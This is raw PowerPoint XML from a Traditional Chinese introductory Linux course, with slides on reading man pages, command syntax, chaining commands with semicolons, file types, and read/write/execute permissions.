            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>從目前游標處向下搜尋 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>“mode”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>這個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>字</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>查看指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>chgrp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>從目前游標處向下搜尋 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>“group”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>這個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>字</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>查看指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>”touch”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>目前游標處向下搜尋 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>“time”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>這個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>字</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="28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作</a:t>
            </a:r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682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400" dirty="0"/>
              <a:t>指令下達一般寫法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> ~]# command [-options] parameter1 parameter2 ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>一行指令的第一個單字，一定是可執行指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>該指令可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>-option </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>加上其他特殊功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>參數後可加其他附加參數或其他功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>變數</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>Enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>後，代表開始執行該串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>指令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>大小寫是完全不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>意義</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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文字介面指令下達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492920" y="5500440"/>
              <a:ext cx="4093920" cy="291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77080" y="5437080"/>
                <a:ext cx="41256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514520" y="5500440"/>
              <a:ext cx="4015080" cy="792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498680" y="5437080"/>
                <a:ext cx="404676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300320" y="5564880"/>
              <a:ext cx="3307680" cy="288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284120" y="5501520"/>
                <a:ext cx="333972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457280" y="5436360"/>
              <a:ext cx="421920" cy="57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41440" y="5372640"/>
                <a:ext cx="4536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257640" y="3828960"/>
              <a:ext cx="1350360" cy="78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41800" y="3765600"/>
                <a:ext cx="1382040" cy="205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6083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>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>“;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>用法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>連續下多個指令分號</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> ~]# command1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>command2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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文字介面指令下達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285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410639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indent="0" algn="ctr" eaLnBrk="0" hangingPunct="0"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三、檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" b="1" dirty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權限與目錄配置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7235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410639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indent="0" algn="ctr" eaLnBrk="0" hangingPunct="0"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三、檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" b="1" dirty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權限與目錄配置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70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檔案權限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Others</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>適合多人多工、可達保密防諜之目的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與目錄之權限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140968"/>
            <a:ext cx="7632848" cy="2873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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="-552600" y="0"/>
              <a:ext cx="2610360" cy="16704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-568440" y="-63360"/>
                <a:ext cx="2642040" cy="179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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2076480" y="2711520"/>
              <a:ext cx="1429200" cy="51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60640" y="2647800"/>
                <a:ext cx="146088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6419880" y="2730600"/>
              <a:ext cx="844920" cy="38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404040" y="2666880"/>
                <a:ext cx="87660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4794120" y="2749680"/>
              <a:ext cx="711720" cy="702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778280" y="2685960"/>
                <a:ext cx="74340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920880" y="5829120"/>
              <a:ext cx="901800" cy="1274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05040" y="5765760"/>
                <a:ext cx="93348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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2178000" y="3664080"/>
              <a:ext cx="527400" cy="572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162160" y="3600360"/>
                <a:ext cx="5590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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2470320" y="5848200"/>
              <a:ext cx="743040" cy="640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54120" y="5784840"/>
                <a:ext cx="7750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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3568680" y="3854520"/>
              <a:ext cx="1086120" cy="385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552840" y="3790800"/>
                <a:ext cx="111780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筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4616280" y="5854680"/>
              <a:ext cx="718200" cy="637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600440" y="5791320"/>
                <a:ext cx="7498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筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5543640" y="3238560"/>
              <a:ext cx="1225800" cy="14652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527800" y="3174840"/>
                <a:ext cx="1257480" cy="27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筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7613640" y="5791320"/>
              <a:ext cx="489240" cy="446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7597800" y="5727600"/>
                <a:ext cx="52092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8" name="筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="704880" y="4692600"/>
              <a:ext cx="387720" cy="3204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89040" y="4629240"/>
                <a:ext cx="4194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9" name="筆跡 18"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2546280" y="2133720"/>
              <a:ext cx="902160" cy="255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2530440" y="2070000"/>
                <a:ext cx="9338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筆跡 19"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1168560" y="4718160"/>
              <a:ext cx="400320" cy="320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152360" y="4654440"/>
                <a:ext cx="4323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筆跡 20"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3384720" y="2165400"/>
              <a:ext cx="1536840" cy="1296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368520" y="2101680"/>
                <a:ext cx="15688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筆跡 21"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1670040" y="4699080"/>
              <a:ext cx="356040" cy="3852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654200" y="4635360"/>
                <a:ext cx="3877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3" name="筆跡 22"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1771560" y="4686480"/>
              <a:ext cx="1524600" cy="129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755720" y="4622760"/>
                <a:ext cx="15562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4" name="筆跡 23"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3645000" y="4692600"/>
              <a:ext cx="597240" cy="12096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629160" y="4629240"/>
                <a:ext cx="62892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5" name="筆跡 24"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1243080" y="2164320"/>
              <a:ext cx="907560" cy="3636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227240" y="2100960"/>
                <a:ext cx="939240" cy="163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7148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檔案屬性</a:t>
            </a:r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/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>檔案屬性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 7" descr="0210filepermission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9250" y="2393950"/>
            <a:ext cx="5956300" cy="294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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2997360" y="2635200"/>
              <a:ext cx="527400" cy="38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981160" y="2571840"/>
                <a:ext cx="5594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3848040" y="2660760"/>
              <a:ext cx="78156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832200" y="2597040"/>
                <a:ext cx="8132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2035800" y="2643120"/>
              <a:ext cx="450720" cy="78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019960" y="2579760"/>
                <a:ext cx="4824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6100920" y="4693320"/>
              <a:ext cx="900360" cy="360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084720" y="4629960"/>
                <a:ext cx="9324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4636440" y="4707720"/>
              <a:ext cx="1043280" cy="7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620240" y="4644000"/>
                <a:ext cx="10753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4136400" y="5043240"/>
              <a:ext cx="207360" cy="36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120200" y="4979880"/>
                <a:ext cx="2394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2521800" y="4757760"/>
              <a:ext cx="871920" cy="288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505960" y="4694040"/>
                <a:ext cx="903600" cy="15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719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 smtClean="0"/>
              <a:t>檔案類型有下列幾種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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>普通檔案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>目錄檔案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>為符號鏈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>接檔案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>為塊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>設備檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>裝置檔裡面的可供儲存的周邊設備</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>可隨機存取裝置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>為字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>設備檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>序列埠設備，例如鍵盤、滑鼠</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3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種類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263600" y="2184480"/>
              <a:ext cx="267120" cy="129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47760" y="2120760"/>
                <a:ext cx="2988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320840" y="2603520"/>
              <a:ext cx="190800" cy="194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05000" y="2540160"/>
                <a:ext cx="2224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276200" y="3168720"/>
              <a:ext cx="15912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260360" y="3105000"/>
                <a:ext cx="1908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263600" y="3949560"/>
              <a:ext cx="209880" cy="68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47760" y="3886200"/>
                <a:ext cx="2415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346040" y="4927680"/>
              <a:ext cx="248040" cy="576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30200" y="4863960"/>
                <a:ext cx="2797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35040" y="450720"/>
              <a:ext cx="775080" cy="1759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19200" y="387360"/>
                <a:ext cx="806760" cy="18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907280" y="2178720"/>
              <a:ext cx="1343520" cy="360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891440" y="2115360"/>
                <a:ext cx="13752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071800" y="2736000"/>
              <a:ext cx="1136160" cy="147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055960" y="2672640"/>
                <a:ext cx="116784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821600" y="3300480"/>
              <a:ext cx="2043360" cy="216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805760" y="3236760"/>
                <a:ext cx="207540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936080" y="3843360"/>
              <a:ext cx="1771920" cy="432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920240" y="3779640"/>
                <a:ext cx="180360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2050200" y="4850640"/>
              <a:ext cx="1743480" cy="216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034360" y="4786920"/>
                <a:ext cx="1775160" cy="149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4793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258519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>三種基本的訪問權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>對檔案的含義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r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>讀取檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>內容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>可以新增、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>修改檔案內容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>可以執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>該檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>三種基本的訪問權限對目錄的含義</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>可以列出目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>中的檔案、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>瀏覽目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>內容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>可執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>可以在該目錄中創建、刪除、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>移動檔案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>指令進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>該目錄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權限介紹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4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5371920" y="1568520"/>
              <a:ext cx="425880" cy="194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356080" y="1504800"/>
                <a:ext cx="4575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381400" y="2184480"/>
              <a:ext cx="48276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65200" y="2120760"/>
                <a:ext cx="5148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508120" y="2762280"/>
              <a:ext cx="425880" cy="25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92280" y="2698920"/>
                <a:ext cx="4575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676680" y="2679840"/>
              <a:ext cx="279720" cy="38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660840" y="2616120"/>
                <a:ext cx="31140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400480" y="3321000"/>
              <a:ext cx="42552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84280" y="3257640"/>
                <a:ext cx="4575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4127400" y="3809880"/>
              <a:ext cx="1670400" cy="450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111560" y="3746520"/>
                <a:ext cx="17020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1680" y="260280"/>
              <a:ext cx="1549800" cy="16322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5840" y="196920"/>
                <a:ext cx="1581480" cy="175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5400720" y="1664280"/>
              <a:ext cx="62172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384880" y="1600920"/>
                <a:ext cx="653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6564960" y="1614240"/>
              <a:ext cx="829080" cy="75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49120" y="1550880"/>
                <a:ext cx="86076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436120" y="3200400"/>
              <a:ext cx="729000" cy="716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420280" y="3136680"/>
                <a:ext cx="76068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264920" y="3929040"/>
              <a:ext cx="1629000" cy="216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249080" y="3865320"/>
                <a:ext cx="16606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271520" y="4414680"/>
              <a:ext cx="393480" cy="147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255680" y="4351320"/>
                <a:ext cx="42516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1843200" y="4893480"/>
              <a:ext cx="1550520" cy="1440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827360" y="4829760"/>
                <a:ext cx="158220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1400040" y="5450760"/>
              <a:ext cx="222120" cy="288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384200" y="5387040"/>
                <a:ext cx="253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4386240" y="5572080"/>
              <a:ext cx="600480" cy="756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370400" y="5508360"/>
                <a:ext cx="63216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5457960" y="5457600"/>
              <a:ext cx="550440" cy="75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442120" y="5394240"/>
                <a:ext cx="5821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3271680" y="5450760"/>
              <a:ext cx="879120" cy="2160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3255840" y="5387040"/>
                <a:ext cx="91080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6736680" y="5472000"/>
              <a:ext cx="514440" cy="4320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720840" y="5408640"/>
                <a:ext cx="54648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2428920" y="6072120"/>
              <a:ext cx="1664640" cy="3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413080" y="6008760"/>
                <a:ext cx="16966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4500720" y="6022080"/>
              <a:ext cx="1207440" cy="1476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484520" y="5958720"/>
                <a:ext cx="1239480" cy="14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740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何謂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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
